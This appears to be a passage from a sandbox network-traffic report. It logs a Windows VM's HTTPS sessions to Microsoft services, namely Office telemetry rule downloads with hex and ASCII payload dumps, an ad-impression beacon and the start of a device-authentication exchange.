2024-11-21 08:53:52 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:52 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085352Z-178bfbc474bv7whqhC1NYC1fg4000000014000000000fmwb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:52 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.6	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:52 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:52 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:52 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 2b92647c-c01e-00a2-646f-3b2327000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085352Z-1777c6cb754vxwc9hC1TEBykgw0000000atg00000000ch4e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:52 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.6	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:52 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:53 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:52 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 5bcf05b2-a01e-006f-6e7a-3b13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085352Z-1777c6cb754vxwc9hC1TEBykgw0000000aug00000000b37d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:53 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.6	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:52 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:53 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:52 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085352Z-1777c6cb754mrj2shC1TEB6k7w0000000az0000000009nxt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:53 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49778	20.234.120.54	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:53 UTC	602	OUT	GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=532834141&PG=PC000P0FR5.0000000IRU&REQASID=3231C04CB2E542AD8FF0B98138491059&UNID=338389&ASID=b7a7790eefe24cf693e928a22d328dc1&&DS_EVTID=3231C04CB2E542AD8FF0B98138491059&DEVOSVER=10.0.19045.2006&REQT=20241121T085332&TIME=20241121T085341Z&ARCRAS=&CLR=CDM HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: ris.api.iris.microsoft.com Connection: Keep-Alive
2024-11-21 08:53:53 UTC	183	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 request-id: d9c22513-7ec3-45de-8681-5c066543c762 Date: Thu, 21 Nov 2024 08:53:53 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.6	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:54 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:54 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:54 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085354Z-178bfbc474bq2pr7hC1NYCkfgg00000001e00000000035pq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:54 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.6	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:54 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:55 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:54 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085354Z-178bfbc474bscnbchC1NYCe7eg00000001dg000000005tne x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:55 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.6	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:54 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:55 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:55 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 94562d6e-b01e-0001-80db-3b46e2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085355Z-r1d97b99577d6qrbhC1TEBux5s0000000a6g00000000at0s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:55 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.6	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:54 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:55 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:55 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085355Z-1777c6cb754n67brhC1TEBcp9c0000000awg00000000aw10 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-21 08:53:55 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.6	49783	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:54 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:55 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:55 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 3af7945d-501e-0016-1564-3b181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085355Z-178bfbc474bp8mkvhC1NYCzqnn000000013g000000005r06 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:55 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.6	49784	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:56 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:57 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:57 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085357Z-178bfbc474bxkclvhC1NYC69g40000000180000000002yd2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:57 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.6	49785	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:56 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 7a 63 31 4a 70 4f 44 57 6b 71 4d 30 4b 79 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 38 34 62 36 35 39 36 38 38 37 37 64 30 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: Izc1JpODWkqM0Ky5.1Context: 7b84b65968877d0b
2024-11-21 08:53:56 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-21 08:53:56 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 7a 63 31 4a 70 4f 44 57 6b 71 4d 30 4b 79 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 38 34 62 36 35 39 36 38 38 37 37 64 30 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 65 43 71 62 73 64 2f 4f 79 57 46 57 67 38 45 48 79 4a 70 32 41 41 73 74 73 6a 69 47 75 76 31 58 36 65 5a 55 44 44 2b 51 49 36 44 78 50 50 7a 37 67 77 39 62 51 46 52 5a 79 63 45 47 74 5a 50 4e 4f 44 62 39 4d 74 36 37 78 31 50 72 76 34 46 39 70 71 75 39 63 56 6a 30 49 79 6c 61 6d 67 67 58 79 4f 38 6f 59 58 2f 62 36 50 6d 65 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: Izc1JpODWkqM0Ky5.2Context: 7b84b65968877d0b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAeeCqbsd/OyWFWg8EHyJp2AAstsjiGuv1X6eZUDD+QI6DxPPz7gw9bQFRZycEGtZPNODb9Mt67x1Prv4F9pqu9cVj0IylamggXyO8oYX/b6Pme
